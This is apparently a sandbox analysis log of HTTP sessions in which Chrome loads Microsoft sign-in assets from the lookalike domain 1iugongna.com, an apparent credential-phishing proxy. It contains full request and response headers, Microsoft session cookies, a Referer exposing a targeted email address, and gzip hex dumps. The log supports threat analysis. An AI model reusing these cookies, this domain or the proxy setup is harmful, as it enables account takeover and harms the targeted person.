                                                                              2025-01-10 20:42:05 UTC1386INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 109863
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Thu, 26 Jan 2023 00:32:54 GMT
                                                                              ETag: 0x8DAFF34DD9DC630
                                                                              x-ms-request-id: 7c71ce12-201e-0029-80a0-638a9d000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204205Z-155884f84d4fp6gshC1BL1eu740000000bh0000000019r1c
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_MISS
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:05 UTC14998INData Raw: 1f 8b 08 00 00 00 00 00 00 03 e4 bd 6b 7b db c8 91 30 fa 7d 7f 05 c5 93 68 00 13 a4 48 ea 6a 92 10 d7 e3 f1 64 bd c7 63 fb b5 3d d9 37 af cc f8 81 c8 a6 84 31 04 30 b8 d8 56 44 ee 6f 3f 55 d5 77 a0 49 c9 1e 27 9b 73 4e 9e 8c 45 34 1a 7d a9 ae ae ae aa ae cb c1 a3 bd 7f 6b 3d 6a 75 1f fe bf d6 db 77 4f de bc 6b bd fa b9 f5 ee 3f 9e bf f9 a9 f5 1a 9e fe d2 7a f9 ea dd f3 a7 cf 1e de 0e 76 8a ff bd bb 8e 8b d6 32 4e 58 0b fe 5e 46 05 5b b4 b2 b4 95 e5 ad 38 9d 67 f9 2a cb a3 92 15 ad 1b f8 37 8f a3 a4 b5 cc b3 9b 56 79 cd 5a ab 3c fb 8d cd cb a2 95 c4 45 09 1f 5d b2 24 fb dc f2 a0 b9 7c d1 7a 1d e5 e5 6d eb f9 6b bf 07 ed 33 68 2d be 8a 53 f8 7a 9e ad 6e e1 f7 75 d9 4a b3 32 9e b3 56 94 2e a8 b5 04 1e d2 82 b5 aa 74 c1 f2 d6 e7 eb 78 7e dd fa 25 9e e7 59 91
                                                                              Data Ascii: k{0}hHjdc=710VDo?UwI'sNE4}k=juwOk?zv2NX^F[8g*7VyZ<E]$|zmk3h-SznuJ2V.tx~%Y
                                                                              2025-01-10 20:42:06 UTC1386INData Raw: ec f3 c8 d9 e7 d9 7a 78 d4 0f a8 77 d9 a9 7b 00 ca 16 4d 63 eb 5f 0c 4c cf 01 a3 b5 83 5d cd d6 d3 73 7a 32 c0 26 c8 e3 9b 29 ff e3 f9 e4 9e 2b 72 16 fc f5 7d d1 59 c3 7f 7f e0 69 0b 36 68 6a 2f 5f fe 44 99 1d ea 3e c1 22 b6 c1 58 6e 0e 32 31 06 09 af 13 b6 c3 b6 19 8a c7 74 f8 fb bb 3e 7d 8c 8b 6d 20 fc 48 83 3d 38 ff ce 43 1d e0 26 33 1c dc e9 ac 2c e9 84 24 af 02 6d 4b b1 f1 8d e4 b3 a9 07 6b ee 63 10 b7 c3 46 10 b7 b2 c7 13 2c fe 12 ad fe c4 83 02 66 3c ae fe 91 ef 78 13 18 d5 9f 66 69 81 a1 ab 29 9e da 99 df 7c a1 2a bf c4 ac a2 18 77 7b e0 1b 25 38 9e a3 2d a9 8c 71 00 c7 3c 68 db 71 5f 04 6d 3b 3e 39 f1 7b b4 ae 6f 59 09 84 06 bb 3d f5 7b d0 e1 0a 08 d8 8b b8 28 6b 61 bc 39 29 c7 a0 ce 44 e6 3f 50 4a dd 0c d3 fd 3e c9 31 50 46 1b 0b da 94 4d 41 56
                                                                              Data Ascii: zxw{Mc_L]sz2&)+r}Yi6hj/_D>"Xn21t>}m H=8C&3,$mKkcF,f<xfi)|*w{%8-q<hq_m;>9{oY={(ka9)D?PJ>1PFMAV
                                                                              2025-01-10 20:42:06 UTC9510INData Raw: 23 30 22 75 c1 a1 5b a0 67 5c a3 58 32 27 9a 62 c7 a1 cd 04 4a 6f 34 45 70 03 b3 9f b8 bb 44 67 b9 38 b0 3b 37 09 72 77 d0 9d 93 c7 5d ad 74 cb 27 62 b8 95 4f e1 cc ec 52 35 5a 41 ba 85 ae 58 30 9c 7a a4 44 c9 ad f6 53 1e c9 0b d9 b1 eb 4e c8 a4 8e e4 ba 86 5b 12 3a 6f 2d f6 c5 6d f2 c4 30 68 7d 23 11 e4 9e 9b 3f 92 16 d1 30 7e c9 4a 72 85 b5 29 df 30 5f 1a eb d9 6c 18 53 82 a5 60 c4 f4 88 e1 a4 79 f5 39 95 31 36 4c f7 9f da 08 80 a3 9a ba 59 be 74 46 4c b3 9b cc 37 3d 92 b8 1f ee 9d 10 a3 05 97 29 9e c4 3e 2e 6c de d3 d8 56 b4 50 23 73 d1 f4 3b b9 0b e5 c7 f5 6d ee f9 9b b1 01 46 c9 8c 23 77 85 a0 24 36 cb 28 53 7c 77 93 65 37 c5 fa c6 fb 2d 3c b6 f1 99 42 0b 5e d1 8d 33 ba 76 60 76 87 62 70 1d c2 5b b3 43 d5 28 26 75 c7 17 04 33 de 04 4e c5 54 84 4a a3
                                                                              Data Ascii: #0"u[g\X2'bJo4EpDg8;7rw]t'bOR5ZAX0zDSN[:o-m0h}#?0~Jr)0_lS`y916LYtFL7=)>.lVP#s;mF#w$6(S|we7-<B^3v`vbp[C(&u3NTJ
                                                                              2025-01-10 20:42:06 UTC6289INData Raw: cd 3d fb 73 db 36 d2 bf 7f 7f 85 cd 7a 1c 22 82 9f 79 34 21 c3 ea 1c 57 ed b4 13 c7 19 ab b9 cc 8d ac 78 68 99 b2 d9 c8 62 4a 52 76 12 4b f7 b7 df 3e 00 10 20 29 c5 c9 f5 66 be 1f 6c 52 20 9e 8b c5 02 fb c0 2e 05 2d d7 3f 0a ce 04 a9 97 98 f7 e2 02 bd 76 20 51 a7 df 80 eb 09 bf 8c c7 f4 64 d7 ed 4e 1e 4e 3a 98 4c 74 6a 41 c9 c9 75 5a d2 8b 62 c3 9c 32 2a ed 18 aa 77 d2 27 a6 8a a6 1a 75 30 c4 8e aa d8 64 91 cb 00 d7 48 ac 0a 8a a2 33 6b 9d a4 b9 b1 4f 56 31 db a3 db 8b a6 08 cb 43 4f cb f0 ed ea 22 cd ef d7 08 65 5d d2 c4 ec 3a 2e 3e b4 c8 c9 76 49 58 f9 55 a7 91 2b 02 7d d4 d7 fb 20 19 aa f5 1a e2 3b e6 6f f3 9f 87 2a a6 6c 02 67 2d f5 02 db 6e 3e 75 7f 99 e8 27 39 ee 85 4b e3 9d 3c 7f fc 37 45 45 82 dd 97 82 df 3c 7d fe e4 6b e1 3c ed 9d b9 4d 0b de a6
                                                                              Data Ascii: =s6z"y4!WxhbJRvK> )flR .-?v QdNN:LtjAuZb2*w'u0dH3kOV1CO"e]:.>vIXU+} ;o*lg-n>u'9K<7EE<}k<M


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              47192.168.2.549919207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:05 UTC1768OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:05 UTC799INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 673
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT
                                                                              ETag: 0x8D7B0071D86E386
                                                                              x-ms-request-id: 3d521bf5-a01e-005d-7087-63c9d2000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204205Z-1698bcdb8c7fphz4hC1BL1tr4c0000000bpg00000000gtw0
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:05 UTC673INData Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41
                                                                              Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9!9A


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              48192.168.2.549916207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:05 UTC1498OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_ae573f441ee1cf781ec7.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:05 UTC1405INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 15748
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Thu, 26 Jan 2023 00:32:55 GMT
                                                                              ETag: 0x8DAFF34DE08B462
                                                                              x-ms-request-id: 90cf67bd-e01e-0044-37a0-633ed6000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204205Z-155884f84d45wptthC1BL18x980000000br000000000s8r4
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:05 UTC10INData Raw: 1f 8b 08 00 00 00 00 00 00 03
                                                                              Data Ascii:
                                                                              2025-01-10 20:42:05 UTC5517INData Raw: ad 5b 7d 77 da c6 d2 ff ff 7e 0a a1 db 43 a4 9b b5 6c da a4 ed c5 55 7d 1c 5e 12 5a 3b 76 0d ee 5b 92 c3 11 68 01 c5 42 52 b5 c2 98 1a be fb f3 9b 5d 09 09 10 d8 e9 73 73 1c 83 76 67 67 67 67 e7 7d e4 e3 ff 54 fe a5 fd 47 3b 7a fe 3f ad db 3b bf e9 69 57 6d ad f7 ae 73 d3 d4 ae f1 f4 87 f6 fe aa d7 69 b4 9e 8f 87 36 a5 ff bd 89 27 b4 91 e7 73 0d 9f 03 47 70 57 0b 03 2d 8c 35 2f 18 86 71 14 c6 4e c2 85 36 c5 ef d8 73 7c 6d 14 87 53 2d 99 70 2d 8a c3 cf 7c 98 08 cd f7 44 82 45 03 ee 87 73 cd 00 ba d8 d5 ae 9d 38 59 68 9d 6b d3 02 7e 0e 6c de d8 0b b0 7a 18 46 0b 7c 9f 24 5a 10 26 de 90 6b 4e e0 4a 6c 3e 1e 02 c1 b5 59 e0 f2 58 9b 4f bc e1 44 bb f4 86 71 28 c2 51 a2 c5 7c c8 bd 7b 6c 22 66 18 df dc 82 69 4e cc 35 c1 13 6d 14 c6 c9 44 d1 61 69 5d 82 4c b1 0a
                                                                              Data Ascii: [}w~ClU}^Z;v[hBR]ssvgggg}TG;z?;iWmsi6'sGpW-5/qN6s|mS-p-|DEs8Yhk~lzF|$Z&kNJl>YXODq(Q|{l"fiN5mDai]L


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              49192.168.2.549921207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:05 UTC1486OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:05 UTC762INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                              Content-Type: image/gif
                                                                              Content-Length: 2672
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Last-Modified: Fri, 17 Jan 2020 19:28:37 GMT
                                                                              ETag: 0x8D79B83739984DD
                                                                              x-ms-request-id: 51e397ec-f01e-0021-6ea0-63d880000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204205Z-155884f84d4p2rnjhC1BL1e9900000000bkg000000013zmt
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_REMOTE_HIT
                                                                              X-Cache-Info: L2_T1
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:05 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                              Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              50192.168.2.549922207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:05 UTC1769OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:05 UTC800INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:05 GMT
                                                                              Content-Type: image/svg+xml
                                                                              Content-Length: 1435
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                                              ETag: 0x8D79B8373CB2849
                                                                              x-ms-request-id: 15c6dc2e-d01e-0078-6a86-6360ae000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204205Z-155884f84d4q4474hC1BL15uen0000000bt000000000bd8x
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache-Info: L1_T2
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
